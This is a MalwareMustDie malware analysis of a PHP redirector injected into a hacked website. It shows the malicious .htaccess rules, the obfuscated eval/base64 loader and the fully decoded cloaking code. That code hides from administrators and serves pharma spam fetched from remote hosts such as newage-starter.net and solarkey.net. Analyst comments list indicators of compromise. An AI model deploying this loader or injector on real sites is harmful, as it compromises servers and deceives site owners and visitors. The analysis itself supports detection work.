
Part2: And another PHP Injected | PHP/Redirector #w00t!

MalwareMustDie Apr 12th, 2014 389 Never
  1. // #MalwareMustDie Reported Cases FOLLOW
  2. // $ check &&  date
  3. // @unixfreaxjp morgan.freenode.net Saturday April 12 2014 -- 08:14:55 -04:00
  4. // Thanks to our friends who reported this evil code.
  5. // #ALERT - SKIDS PHP SERVES MALICIOUS REDIRECTOR!!!!
  6. // Language trace: Indonesia Hacker < Drop dead!!!
  7.  
  8. // Evil .htaccess:
  9. <IfModule mod_rewrite.c>
      # Analyst notes. The rule below fires only when all of the following hold:
      #   - the User-Agent or the Referer names a search engine, or the User-Agent carries the
      #     marker "ANTIPIDERSIA" (the same string the decoded PHP treats specially);
      #   - the URI ends in "/" or the filename ends in one of the listed page extensions;
      #   - the request is not already for main.php;
      #   - main.php exists on disk at the hard-coded vhost path.
      # Requests that match none of the search-engine/marker conditions are not rewritten, so
      # the site looks unchanged to a visitor who types the URL directly.
      # Only the [NC] condition is case-insensitive; the other patterns are case-sensitive.
  10. RewriteEngine On
  11. RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|ANTIPIDERSIA) [OR]
  12. RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol)
  13. RewriteCond %{REQUEST_URI} /$ [OR]
  14. RewriteCond %{REQUEST_FILENAME} (shtml|html|htm|php|xml|phtml|asp|aspx)$ [NC]
  15. RewriteCond %{REQUEST_FILENAME} !main.php
  16. RewriteCond /var/www/vhosts/sgvch/www/main.php -f
      # A single path segment followed by "/" is internally rewritten to /main.php with the
      # segment passed as "p"; the decoded PHP reads it back as $_GET['p'].
      # When auditing a site, treat unexpected RewriteCond lines keyed on search-engine
      # User-Agent/Referer values, and rewrites to a PHP file nobody deployed, as indicators.
  17. RewriteRule ^([^/]*)/$ /main.php?p=$1 [L]
  18. </IfModule>
  19.  
  20.  
  21. // ------------------
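  22. // INJECTED CODE
      // Loader: preg_replace() with the /e modifier runs its replacement string as PHP, and the
      // \x.. escapes spell eval(base64_decode( ... )); around nested base64 layers.
      // $tpp set at the start is the temp path the decoded code picks up via isset($tpp).
      // The /e modifier was deprecated in PHP 5.5 and removed in PHP 7.0.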
  23. // ------------------
  24.  
  25. <?php Error_Reporting(0); $tpp='/var/www/vhosts/sgvch/tmp'; $xjnOhCWijm7="5Rn9U9s49l+HHQgc
  26. G8pOp5s7EtJzmNjWGDkfBc+c7SgwU/6QeDe2UXO42wBDQkJ770myYycEuG3vh7sLu7Wt96Gnp/cpXX7U2jy4rlTLtb
  27. +Xa2+TzXr9sHIEX5XdN+WdevLu7n50UN0p10cD/uHy4+VHDr9rzz9veIzf8r8sUW6WqkAzXkbzmM8M3ehTP1CDA8C5
  28. wPe27kmEik9dnVg0GPX7/XgUjkbh07hNex6oLwFBoNXSbM0H4EKe/dLe0RYsoVIrlUCmOIm0JmlRL0okUbtnWkwzTG
  29. 65WrMVKBawSsEQhia3PGlQYlP/vBW7ZkvQIWAGgH/0qIfUS6AHABHTg4VWJpUl2OMCNluGzQHWNgy2Mtc3AJy0coOX
  30. sGHBleZVQNhM6AHnH3gUTS8/No9z4+H063yOOjq7FNuMZG1Npyk8FssEaiR+vPxoNZqGnRHzlNoy3E6QNBhzb6LIM3
  31. TiH9NObFIWnVt6plXJLCyyVpaw/ncmZ14r3exHSjcLi6y/W7qHHyndQ1hk/d3SPf5I6R7DIuvvlm7+I6Wbh0XW3y3d
  32. tx8p3bewyPp10l3gj3PhvRdSVM3zKAuumesORDi+Zk3XJayBgQ8Gxzjiuh2KYTKpY7w441T3KOJyZJAGvQrtah7zgs
  33. TreJUWZRVGmy6GlGSF8TJGIMTP8c3hBgA3SZMGlcrBxna5UhlIZLEGuQTgwjqQcPZKpZ82ym8Tr3dMiN3UzOTdYAAL
  34. xclbhtHSKfA72N2ulnFVpuHTdn7AJT7NY6QZBwIoxNcePCuwAeZTOSqf3cZFOpiE+tR/gqhWPijXyrXl3GY1qHUsRc
  35. unsARTWBImST6FcdxLJAXZQUcsnedNuf42cVPOqKNsozNM2JXPn3ng+rRVaRKYNkgiSyO65jn4IPjAD0Zs+AJrdnLQ
  36. 9AlMxdNzzjXS8gk81L9EPAg8HU/TbWoKFudi4Fygur7hUiB22ppJPJBIs6mj03ONIbBB/CaxOo7t91oeg70CfOpZvu
  37. aisclhB7YDyCxg6Kcz+FrTMMkJMRlOcEosxzT0c0i5XWcnfdFplwAwmwwWq3Wdlt4DB2zAHjttwyNN0nXaOml19IKA
  38. ttHtWB1L10x419pAQ0zH0o2mZoMmkCtpGl0QRDxAhYDpEMtoujoslVhWjxEkBfmd047PqOWcQh3TZs6pxhq+gdOeGz
  39. oDYzRTpeqaq4EKHBNcrNeMNLCB/DYK91q2ArGvWf3z6e1fyfC0Mnz3SZNl0IJ+nNEK66/XjspqCDzvVlRGy8jC86Tv
  40. FcznjXCyE4M5LY8MLZ/0deo7u7b3s8GGEuhsUVsjwJDBznlORjHcMk4gYDoY/Bzk4Lmgbd9RTHDNT7iiiiyZczO/R8
  41. e5yAAOpFMzWPLFwd2DpEtDwDJZkEIkSDpKNouKEGpU6U0qTsrzcvm7u1PfONzYL9eqG7uyCpZVYY5MPiuHtVK9tFfa
  42. hmpzxB+nj3zHYPzA6Jn2CDeDWg2DJ3dXUJnWfzks88361jY/PPp5e2OPj4ZRtFGuH0TRfn1fQmbxNIrKO6P7JB79ao
  43. 4WDBqsqd/foRArIKYxnd4Xpr6L5OAyaiQY3J0Ydmd1hsl9jh6+lhHc+3qDcp+KMpja/Ki2zSHXZQqplf92VK7WK0e1
  44. DSy9eZ943ASObeTIoehmDc3jcqfju8hdlcBfGSK2DUHFu8/PoxRfLR3U3+/WymKuw81DyLtuwwXeHoSfYACDVTEVJ6
  45. wgZq5nQULDZ/zL9C5azLSkMqEsUAhuAGZXcHEmbVGY43VndowNyjHTIAdOQ/ybwN9sOhPFpjLYghuK3Of03aFutDQT
  46. xcYPOSr+hTztEwgoIpI8reDBGqPHEubPWfgFpB/LMI41CEdZhoZgRE90Ak9caDiKYCAexUupUHZrumER0V1hEyVrpH
  47. WKX7MolWiVr422FcMbDjOm3AdjmVK52Ijna6pcdZU1RK+LHX86TvwfaFFVQ2jwIORkLsTGmJ9WX6Mt4xTyKonm8ZQH
  48. 7zXTNvremB+NuXrnO3U+jydjTs3hUXXM/fObSfwlnsTfBvwNKMOIZtPp1+nX2ZwfaKAZoxtBZIS/byMxmW0X2v7X6U
  49. SRFY4dPsNG/HP2DfbFtqW3Ih7pMQNKGhewp+lpg8pQtmH4uZ0xaR8WPfSgGoDsKzoB8d5zI6goKBTdhtdg8+kEnVw2
  50. +IoRVB3H3us5CfRlZkLvvl4BWuS0ykLOiIV6ivOieAI5E+5lGdIF5ZZSaIwgA9heBM0Ea9AmzaiUDWEFw6AiDNZU0v
  51. /OFg/SHmtRF+E5yTjrpGAO+A+LDQsblnAUjKSf4xqstmuoUyl4WSBxxFLrFCOI0zspMJqGKQOBKfOCcg+RFgbDP/6Y
  52. 4k9s2uIUCh1/H89uXOIO0oDTIKYtiiWovk07hQpB+w0owaCjI9iHXUGwCq6xiwVcH5xd4ErqQS6ACYwr2J4Y8t3uzj
  53. 7PjSTQfmGh1f7tt7Hw7qzJAyz05Lu2AS5tQQHs3yY+tZP7nRLGERApHt1FCL0fCVIosT2aF2GMvY9PWc83gVlavmWL
  54. 96AuB3QwiEexUURVydcW1AtMuR42XYCXV4ZAldFLqAMCOqIs6wHHUAuI90HFOskal4rfZ+LfhdiCQoIyGdTLkM+EMO
  55. lqxOjKimyjAibAKqpEQpcLUv8MMy+EUEMYmSxeZ4vXh8XrI76q89drz7COKcrTxjdUxYIxVC9QeVPfNw35BNMM+cMU
  56. TRGPDRXxwMaMpOCBxB8IyxbT4V5DNiK3o7iHJbll2DRYSDqIR58hDnefgM9SOG7MKvghBYseZRUu1wlitPu+xmBQig
  57. t+dwjeLk1NKg7qa4wC0SSe/OpDjfYk0SZsgEh0Sj1Qza3BHe2B7UK+GrKOS284caH/k7kx6g4hAg3bht8cZtLaL/IB
  58. xBZr3IzitKnB5Q2eEWDXsqjLbn6Pfl+LcgTBdSjS6k3JhQTLJ5AFp8+JYlJhjDd7aNdrEdcChNAvk4HVQLXc09EmEw
  59. zo0hWv2tRop+iDgQitEi8G24Uk4GXA1Huui2FXYsNG4lTZdIvJ0tCb4iH5b49SpNQ7JUyGWuHeK5NmLgsiHYJ6McS2
  60. INYvqphQ1jdGj0FsB4eC+iDE0JNvzD9kR3rXFp6EWWhzULyzIHfaJwahJjRcBrHYaoR8Dxqn0iEmre1QzPs6bMh5ou
  61. 7MS/kqyvrGVrl0VF+s6FVUB6Xt7dL77dLebn2jtBPyyauoauX6UW2nXtvdqR6Ua4rq4lkSdPNXIx5slLf3qyFPRKyC
  62. uhj2Jk5UaIJP24YvEYjwQ0OYjDtJvHJIIjYuMywxL+1SS8y6vFhlRgXAirmpCvliyb42t/Z+UQaG4qaHQf89djP/nz
  63. AYotnKYP7z+8+LN3bqsDyGvi9Wt5j4Lq7w1PUdX4sVTr9+/ZpFrhda0tvbp1rS4m0nxtPT20XtuU66sbqMgMWI2qFQ
  64. CrZ8Ss3kfm+zXP+ppOrAT9WtUnV4Dk3fBDjJS4l49Ak6XZhCJOXTXNgn7jFWHc/Mn6539QJDlo7q3kLsY/f4VhRlgY
  65. IFcgLRE+TuLRRqofaUiAUFd4/vb+fT6UyeQqbt4O2kgFQ8WJSVmrywUVdLaxYmApM6GLVk7YCVHZCIOxc15L1APy5Q
  66. 59onHiR3V8Oh2beaDddjw+HVveylFHZ2KpkOoOWqQ60nWv61vzPO5eWGUK6glXV2pH7598XIkxuaRcDcluZ/11DJpa
  67. 13lrJzHXmYS9wiy6V3ME/mbRU4xE/s5II77AP2VgOOd1LC+Atzv7bCf+Xkz6o3b7c/XgZhxuDeaf/Ylk3FcyYXJv1k
  68. +RozLRCRS5hJuYKlwidiCQXAvLkVvcZ486yV/i6kFacQyVcyd1lbXI8+sxolhneqfM/TTrEMZO1V8/BO72bTxy8DYe
  69. E9E49BFKYI92LSlOAJRzoTfnIRPf27UEchS4MX4phNtKhn8v9/AQ==";echo preg_replace("/.*/e","\x65\x7
  70. 6\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'ZXZhbChiYXNlNjRfZGVj
  71. b2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0pLU0djeFVWWm9NbVF4V1hsVE1sazFWWG94YVZsWVRteE9hbE
  72. ptV2tkV2FtSXlVbXhMUTBwYVlsVmFObGRzVWxwTlJtZDVWVzE0V2sxcWJISlhiRVU1VUZOSmNFOTVValJUTWpsWlpV
  73. WlNNV05WU2s1UmVqRnBXVmhPYkU1cVVtWmFSMVpxWWpKU2JFdERTbXBOTVVvMVdXdGtWMlJUU1hCUGVWSTBWVEl4ZE
  74. dRelRteFpiRVpwWTFReGFWbFlUbXhPYWxKbVdrZFdhbUl5VW14TFEwcGFUVzFvTlVscGF6ZEtTR2MxWVVkbmVsSnNi
  75. SEJQV0U1S1dXb3hhVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBwVFRCd2NrbHBhemRLU0doRVVWWm9jbUpVUWpaa1
  76. JtUnJVRmRLYUdNeVZUSk9SamxyV2xkT2RscEhWVzlKYkc5NlkwaENhV0pXY0hwWFZtaFRZa05KY0U5M1BUMGlLU2s3
  77. WlhaaGJDaGlZWE5sTmpSZlpHVmpiMlJsS0NKS1NHaHhZbXM1YjFFeFpIQmhiVEF6VUZOU05GRXdSbGxoTWpCM1pXNV
  78. NXRnBEWjJ0bFJGWkNWMGhhTTFacVNreGFhbXhVUzBOU05HRnROVkJoUlU1WVlWZHdkRTU1YTNCUGVWSTBZMVZhV1ZK
  79. NlNuUldWMmh6VW1vd2EyVkZkSFpYU0doVlpGaEdRMVJWVFc5S1NHaHhZbXM1YjFFeFpIQmhiVEF6UzFSelBTSXBLVH
  80. M9IikpO2V2YWwoYmFzZTY0X2RlY29kZSgiSkhnMVlXOW9TalZ2V1VORlJWTTlKeWM3Wm05eUtDUjRVbmx4VFVvMlMx
  81. TmxkR0U5TURza2VGSjVjVTFLTmt0VFpYUmhQQ1I0Y1VaWVJ6SnRWV2hzUmpza2VGSjVjVTFLTmt0VFpYUmhLeXNwZX
  82. lSNE5XRnZhRW8xYjFsRFJVVlRMajBrZUZOdGJYZHpaV0pSWW5Fb0tDUjRPV2hvTTBaWmFUbHpTV0lvSkhocWJrOW9R
  83. MWRwYW0wM1d5UjRVbmx4VFVvMlMxTmxkR0ZkS1Y0ME16ZzNNakUzTXpjcEtUdDlaWFpoYkNna2VEVmhiMmhLTlc5Wl
  84. EwVkZVeWs3IikpOw=='\x29\x29\x3B",".");return;?>
  85.  
  86.  
  87. // ------------------
  88. // DECODED PHP
  89. // ------------------
  90.  
  91.  
  92. <?php Noneif ($_SERVER['HTTP_USER_AGENT'] <> "FSNET") {
      // NOTE(analysis): the "None" after the open tag is not PHP; presumably residue of the
      // decoding/beautifying step -- TODO confirm against the raw sample.
      // The whole payload is skipped when the User-Agent is exactly "FSNET".
      // The lower-cased Host header with every "www." removed is MD5-hashed into $srvfls,
      // which later names this site's cache directory under the temp path.
      // $cgidir is <docroot>/images/, the directory cpimg() downloads into.
  93.     $srvhst = @$_SERVER['HTTP_HOST'];
  94.     $srvhst = strtolower($srvhst);
  95.     $srvfls = str_replace("www.", "", $srvhst);
  96.     $srvfls = md5($srvfls);
  97.     $cgidir = $_SERVER['DOCUMENT_ROOT'] . '/images/';
  98.     function cpimg($cgidir) {
          // cpimg: make sure $cgidir exists, then fetch any of six fixed PNG names that are not
          // already present there from http://solarkey.net/vcl/images/ using copy() on an
          // http:// URL (this needs allow_url_fopen). The return values of mkdir/chmod/copy
          // are not checked.
          // In the decoded code this is only called from the "ANTIPIDERSIA" User-Agent branch.
          // Host-side indicators: the six file names below appearing in <docroot>/images/,
          // and outbound HTTP from the web server to solarkey.net.
  99.         $img1 = 'headervg.png';
  100.         $img2 = 'questionvg.png';
  101.         $img3 = 'answer_1_vg.png';
  102.         $img4 = 'answer_2_vg.png';
  103.         $img5 = 'footervg.png';
  104.         $img6 = 'bgvg.png';
  105.         if (!is_dir($cgidir)) { //0
  106.             mkdir($cgidir, 0755);
  107.         }
               // Each block below: if the image is missing, force the directory to 0755 and
               // download that one file.
  108.         if (!is_file($cgidir . $img1)) { //4
  109.             chmod($cgidir, 0755);
  110.             copy('http://solarkey.net/vcl/images/' . $img1, $cgidir . $img1);
  111.         } //4
  112.         if (!is_file($cgidir . $img2)) { //4
  113.             chmod($cgidir, 0755);
  114.             copy('http://solarkey.net/vcl/images/' . $img2, $cgidir . $img2);
  115.         } //4
  116.         if (!is_file($cgidir . $img3)) { //4
  117.             chmod($cgidir, 0755);
  118.             copy('http://solarkey.net/vcl/images/' . $img3, $cgidir . $img3);
  119.         } //4
  120.         if (!is_file($cgidir . $img4)) { //4
  121.             chmod($cgidir, 0755);
  122.             copy('http://solarkey.net/vcl/images/' . $img4, $cgidir . $img4);
  123.         } //4
  124.         if (!is_file($cgidir . $img5)) { //4
  125.             chmod($cgidir, 0755);
  126.             copy('http://solarkey.net/vcl/images/' . $img5, $cgidir . $img5);
  127.         } //4
  128.         if (!is_file($cgidir . $img6)) { //4
  129.             chmod($cgidir, 0755);
  130.             copy('http://solarkey.net/vcl/images/' . $img6, $cgidir . $img6);
  131.         } //4
  132.        
  133.     }
  134.     if (isset($tpp)) {
               // $tpp is set by the injected loader; when present it is used as the cache root
               // and the 'T' flag is later appended to the operator status string.
  135.         $tmppath = $tpp;
  136.         $tppyes = 'T';
  137.     } else {
               // Otherwise fall back to the system temp directory, or to this script's own
               // directory when sys_get_temp_dir() does not exist.
  138.         if (function_exists('sys_get_temp_dir')) {
  139.             $tmppath = sys_get_temp_dir();
  140.         } else {
  141.             $tmppath = (dirname(__FILE__));
  142.         }
  143.     }
           // Everything from here on runs only for requests WITHOUT a "sukaadmin" cookie.
           // The cookie is set further down for admin-path and no-referer visitors, so those
           // visitors do not reach the cloaking logic again on later requests.
  144.     if (empty($_COOKIE['sukaadmin'])) {
  145.         $google = FALSE;
  146.         $noref = FALSE;
  147.         $paree = FALSE;
  148.         $server_user_agent = @$_SERVER['HTTP_USER_AGENT'];
  149.         $server_referer = @$_SERVER['HTTP_REFERER'];
  150.         $srvhstcheckref = str_replace('www.', '', $srvhst);
  151.         $parameter = @$_GET['p'];
               // $paree: the "p" parameter contains one of the pharma-spam keywords. The value is
               // then reduced to letters, "_" and "-". The $dir computed here is overwritten
               // further down before it is used.
  152.         if ((isset($parameter)) && (preg_match('/cialis|cialas|cilis|tadalafil|cialis|ciallis|cialiss|cials|viagra|vigra|vigara|viagar|sildenafil|vagar|vagra|propecia|finasteride|levitra|pharmacy|drugstore|prescription|drugs|generic|vardenafil|rimonabant|prozac|nolvadex|Nolvadex|lexapro|levitra|lasix|glucophage|fosamax|flagyl|finasteride|doxycycline|diflucan|clomid|cipro|amoxil|amoxicillin|acomplia|accutane|drug|zyrtec|zoloft|zithromax|voltaren|viagra|lipitor|nexium/i', $parameter))) {
  153.             $parameter = preg_replace("#[^a-z_-]#i", "", $parameter);
  154.             $paree = TRUE;
  155.             $dir = md5($parameter);
  156.         }
               // $google: the User-Agent looks like a crawler (the pattern also matches any UA
               // containing "http", "bot", "spider" or "crawler").
  157.         if (preg_match('/Googlebot|gsa-crawler|AdsBot-Google|Mediapartners|Googlebot-Mobile|http|bot|spider|crawler/i', $server_user_agent)) {
  158.             $google = true;
  159.         }
               // $noref: the Referer header is missing or shorter than 3 characters.
  160.         if (strlen($server_referer) < 3) {
  161.             $noref = true;
  162.         }
               // Cloaking step 1: a non-crawler with no referer asking for a spam keyword gets a
               // hand-built 404 page. The page prints SERVER_SOFTWARE followed by " PHP/<version>"
               // and a hard-coded "Port 80", which may differ from the server's genuine error
               // page and can help tell the two apart.
  163.         if (($noref == true) && ($google == FALSE) && ($paree == TRUE)) {
  164.             if ($_SERVER['HTTP_USER_AGENT'] <> "ANTIPIDERSIA") {
  165.                 header($_SERVER['SERVER_PROTOCOL'] . " 404 Not Found");
  166.                 echo '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">' . "
  167. ";
  168.                 echo '<html><head>' . "
  169. ";
  170.                 echo '<title>404 Not Found</title>' . "
  171. ";
  172.                 echo '</head><body>' . "
  173. ";
  174.                 echo '<h1>Not Found</h1>' . "
  175. ";
  176.                 echo '<p>The requested URL ' . $_SERVER['REQUEST_URI'] . ' was not found on this server.</p>' . "
  177. ";
  178.                 echo '<hr>' . "
  179. ";
  180.                 echo '<address>' . $_SERVER['SERVER_SOFTWARE'] . ' PHP/' . phpversion() . ' Server at ' . $_SERVER['HTTP_HOST'] . ' Port 80</address>' . "
  181. ";
  182.                 echo '</body></html>';
  183.                 exit;
  184.             }
  185.         }
               // Cookie expiry: 1 January 2022, midnight in the server's time zone.
  186.         $y2k = mktime(0, 0, 0, 1, 1, 2022);
               // Cloaking step 2: a non-crawler requesting an admin/login path is given the cookie
               // sukaadmin=eblan for ".<host without www>" and redirected to the same URL over
               // http://, so site administrators stop seeing the injected behaviour.
  187.         if ((preg_match('/admin|wp-login.php|wp-admin|administrator/i', $_SERVER['REQUEST_URI'])) && ($google == FALSE)) {
  188.             if ($_SERVER['HTTP_USER_AGENT'] <> "ANTIPIDERSIA") {
  189.                 setcookie("sukaadmin", "eblan", $y2k, "/", "." . $srvhstcheckref);
  190.                 $location = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
  191.                 header("Location: " . $location);
  192.                 exit;
  193.             }
  194.         }
               // Cloaking step 3: the same cookie-and-redirect for any non-crawler without a
               // referer. What remains below is reached only by crawler User-Agents, visitors
               // arriving with a referer, or the "ANTIPIDERSIA" User-Agent.
  195.         if (($noref == true) && ($google == FALSE)) {
  196.             if ($_SERVER['HTTP_USER_AGENT'] <> "ANTIPIDERSIA") {
  197.                 setcookie("sukaadmin", "eblan", $y2k, "/", "." . $srvhstcheckref);
  198.                 $location = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
  199.                 header("Location: " . $location);
  200.                 exit;
  201.             }
  202.         }
               // Configuration. $time is overwritten below with time() - 9900000 before it is
               // passed to getPage() as the cURL timeout. $dd is host + URI with "&" encoded.
               // Remote endpoints (network indicators): newage-starter.net and solarkey.net.
               // $autostop, $server_links, $path_links and $server are not read anywhere in the
               // decoded code shown here.
  203.         $time = 15;
  204.         $useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6";
  205.         $dd = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
  206.         $dd = str_replace("&", "%26", $dd);
  207.         $autostop = 0;
  208.         $server_door = 'http://newage-starter.net/startup/comeon_osht501.php';
  209.         $server_links = 'http://newage-starter.net/startup/comelinks_osht501.php';
  210.         $url_new = 'newage-starter.net';
  211.         $path_new = '/startup/comeon_osht501.php';
  212.         $path_links = '/startup/comelinks_osht501.php';
  213.         $server = 'http://solarkey.net/notds/gettheme.php';
               // Cache file name: MD5 of host + request URI with "www." removed.
  214.         $dir = trim(str_replace('www.', '', $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']));
  215.         $dir = md5($dir);
               // $secname is never assigned in the decoded code shown; presumably a leftover
               // from another variant of the script -- TODO confirm.
  216.         if (strstr($secname, "(")) {
  217.             $secfpos = strpos($secname, "(");
  218.             $secname = substr($secname, 0, $secfpos);
  219.         }
  220.         $time = time() - 9900000;
  221.         function checkDir($pap) {
                   // checkDir: count the entries of $pap other than "." and "..". When the
                   // directory cannot be opened, the return value is an HTML fragment
                   // "<font color='red'>NO <path></font>" instead of a number.
                   // The result is printed in the operator status reply ("tmp: ...").
  222.             if ($handle = opendir($pap)) {
  223.                 while (false !== ($file = readdir($handle))) {
  224.                     if ($file != '..' AND $file != '.') {
  225.                         $f++;
  226.                     }
  227.                 }
  228.             } else {
  229.                 $f = "<font color='red'>NO " . $pap . "</font>";
  230.             }
  231.             closedir($handle);
  232.             return $f;
  233.         }
  234.         function scandirphp4($dira) {
                   // scandirphp4: directory-entry counter used when scandir() does not exist.
                   // Counts every readdir() result and subtracts 2, presumably for "." and "..".
  235.             $count = 0;
  236.             $scan = opendir($dira);
  237.             while (($scanfile = readdir($scan))) {
  238.                 $count++;
  239.             }
  240.             closedir($scan);
  241.             $count = $count - 2;
  242.             return $count;
  243.         }
  244.         function do_post_request_new($url_new, $path_new, $data1_new, $data2_new, $data3_new, $data4_new) {
                   // do_post_request_new: hand-written HTTP/1.1 POST over fsockopen() to
                   // $url_new on port 80 with a 30-second connect timeout; used when cURL is
                   // missing or the cURL fetch returned false. Returns the response with the
                   // first 4-byte header separator and everything before it removed.
                   // Form fields sent (URL-encoded): srva, refxa, dira, param.
                   // Network fingerprint for log/IDS matching: headers written without a space
                   // after the colon ("Content-length:", "Accept:*/*", "Connection:Close") and
                   // the fixed "User-agent:Opera 10.00".
                   // NOTE(analysis): the listing shows literal line breaks inside the quoted
                   // strings; presumably "\r\n" in the original, which the "$pos + 4" skip is
                   // consistent with -- TODO confirm against the raw sample.
                   // On connection failure the socket error text is printed and the script dies.
  245.             $socket = fsockopen($url_new, 80, $errno, $errstr, 30);
  246.             if (!$socket) die("$errstr($errno)");
  247.             $data = "srva=" . urlencode($data1_new) . "&refxa=" . urlencode($data2_new) . "&dira=" . urlencode($data3_new) . "&param=" . urlencode($data4_new);
  248.             fwrite($socket, "POST " . $path_new . " HTTP/1.1
  249. ");
  250.             fwrite($socket, "Host: " . $url_new . "
  251. ");
  252.             fwrite($socket, "Content-type: application/x-www-form-urlencoded
  253. ");
  254.             fwrite($socket, "Content-length:" . strlen($data) . "
  255. ");
  256.             fwrite($socket, "Accept:*/*
  257. ");
  258.             fwrite($socket, "User-agent:Opera 10.00
  259. ");
  260.             fwrite($socket, "Connection:Close
  261. ");
  262.             fwrite($socket, "
  263. ");
  264.             fwrite($socket, "$data
  265. ");
  266.             fwrite($socket, "
  267. ");
                   // Read the whole response until the peer closes the connection.
  268.             $result = '';
  269.             while (!feof($socket)) {
  270.                 $result.= fgets($socket);
  271.             }
  272.             $pos = strpos($result, "
  273.  
  274. ");
  275.             $result = substr($result, $pos + 4);
  276.             return $result;
  277.             fclose($socket);
  278.         }
  279.         function getPage($page, $useragent, $timeout, $str, $dd, $dir, $parameter) {
                   // getPage: cURL POST to $page with the supplied User-Agent and timeout,
                   // following redirects, and returning the response body (false on failure).
                   // Sends the same four fields as the socket fallback (srva, refxa, dira, param)
                   // but concatenates them without urlencode().
                   // The caller passes the remote "door" URL, the site host, host + URI, the
                   // cache key and the sanitised keyword.
  280.             $ch = curl_init();
  281.             curl_setopt($ch, CURLOPT_URL, $page);
  282.             curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  283.             curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
  284.             curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  285.             curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  286.             curl_setopt($ch, CURLOPT_POST, 1);
  287.             curl_setopt($ch, CURLOPT_POSTFIELDS, 'srva=' . $str . '&refxa=' . $dd . '&dira=' . $dir . '&param=' . $parameter);
  288.             $result = curl_exec($ch);
  289.             curl_close($ch);
  290.             return $result;
  291.         }
  292.         function getPHMCY($page, $str) {
                   // getPHMCY: cURL POST of a single field "said" to $page with a 5-second
                   // timeout, following redirects, returning the response body.
                   // $useragent is neither a parameter nor declared global here, so it is
                   // undefined inside this function.
                   // Not called anywhere in the decoded code shown.
  293.             $ch = curl_init();
  294.             curl_setopt($ch, CURLOPT_URL, $page);
  295.             curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  296.             curl_setopt($ch, CURLOPT_TIMEOUT, 5);
  297.             curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  298.             curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  299.             curl_setopt($ch, CURLOPT_POST, 1);
  300.             curl_setopt($ch, CURLOPT_POSTFIELDS, 'said=' . $str);
  301.             $result = curl_exec($ch);
  302.             curl_close($ch);
  303.             return $result;
  304.         }
  305.         if (!is_dir($tmppath . "/" . $srvfls . "/")) {
                   // Per-site cache directory: <temp path>/<md5 of host>/, created mode 0777.
                   // A directory named with a 32-character hex string under the temp path,
                   // holding files named the same way, is a host-side indicator.
  306.             mkdir($tmppath . "/" . $srvfls . "/", 0777);
  307.         }
               // Operator status check: a request whose User-Agent is exactly "ANTIPIDERSIA"
               // triggers the image download, counts the cache entries and replies with
               // "CHETKO", the version tag "#SMOS-v5.01" (plus 'T' when $tpp was set) and the
               // count. That User-Agent in access logs points at the operator checking in.
  308.         if ($_SERVER['HTTP_USER_AGENT'] == "ANTIPIDERSIA") {
  309.             cpimg($cgidir);
  310.             $z = checkDir($tmppath . "/" . $srvfls . "/");
  311.             die("<font color='green'>CHETKO</font>#SMOS-v5.01" . $tppyes . "#" . "tmp: " . $z);
  312.         }
               // Count cache entries; at 5002 or more $autostop is set, but nothing in the
               // decoded code shown reads it afterwards.
  313.         $papka = ($tmppath . "/" . $srvfls . "/");
  314.         if (function_exists('scandir')) {
  315.             $xk = count(scandir($papka));
  316.         } else {
  317.             $xk = scandirphp4($papka);
  318.         }
  319.         if ($xk >= 5002) {
  320.             $autostop = 1;
  321.         }
               // Content delivery, only for requests whose "p" matched a spam keyword.
  322.         if ($paree == TRUE) {
                   // Cache hit: print the stored page with the "<!--nwcmhpst--!>" marker removed.
  323.             if (is_file($tmppath . "/" . $srvfls . "/" . $dir)) {
  324.                 $content = file_get_contents($tmppath . "/" . $srvfls . "/" . $dir);
  325.                 $content = str_replace('<!--nwcmhpst--!>', '', $content);
  326.                 echo $content;
  327.                 exit;
  328.             } else {
  329.                 ////////
  330.                 //////////////
                       // Cache miss: fetch the page from the remote "door" server (cURL first,
                       // raw socket as fallback), store it, and print it with the marker removed.
                       // The response is written to the visitor unmodified otherwise, so the
                       // remote server decides what this site serves for these URLs.
  331.                 if (function_exists('curl_init')) {
  332.                     $new_door = getPage($server_door, $useragent, $time, $srvhst, $dd, $dir, $parameter);
  333.                     if ($new_door == false) {
  334.                         $new_door = do_post_request_new($url_new, $path_new, $srvhst, $dd, $dir, $parameter);
  335.                     }
  336.                 } else {
  337.                     $new_door = do_post_request_new($url_new, $path_new, $srvhst, $dd, $dir, $parameter);
  338.                 }
  339.                 $file = fopen($tmppath . "/" . $srvfls . "/" . $dir, 'w');
  340.                 fwrite($file, $new_door);
  341.                 fclose($file);
  342.                 $new_door = str_replace('<!--nwcmhpst--!>', '', $new_door);
  343.                 echo $new_door;
                       // Responses under 2048 bytes are not kept in the cache.
  344.                 $ptf = $tmppath . "/" . $srvfls . "/" . $dir;
  345.                 $sz = filesize($ptf);
  346.                 if ($sz < 2048) {
  347.                     unlink($ptf);
  348.                 }
  349.                 exit;
  350.             }
  351.             ///////////////////////
  352.             /////////////
  353.            
  354.         }
  355.     }
  356. }
  357. ----
  358. #MalwareMustDie!!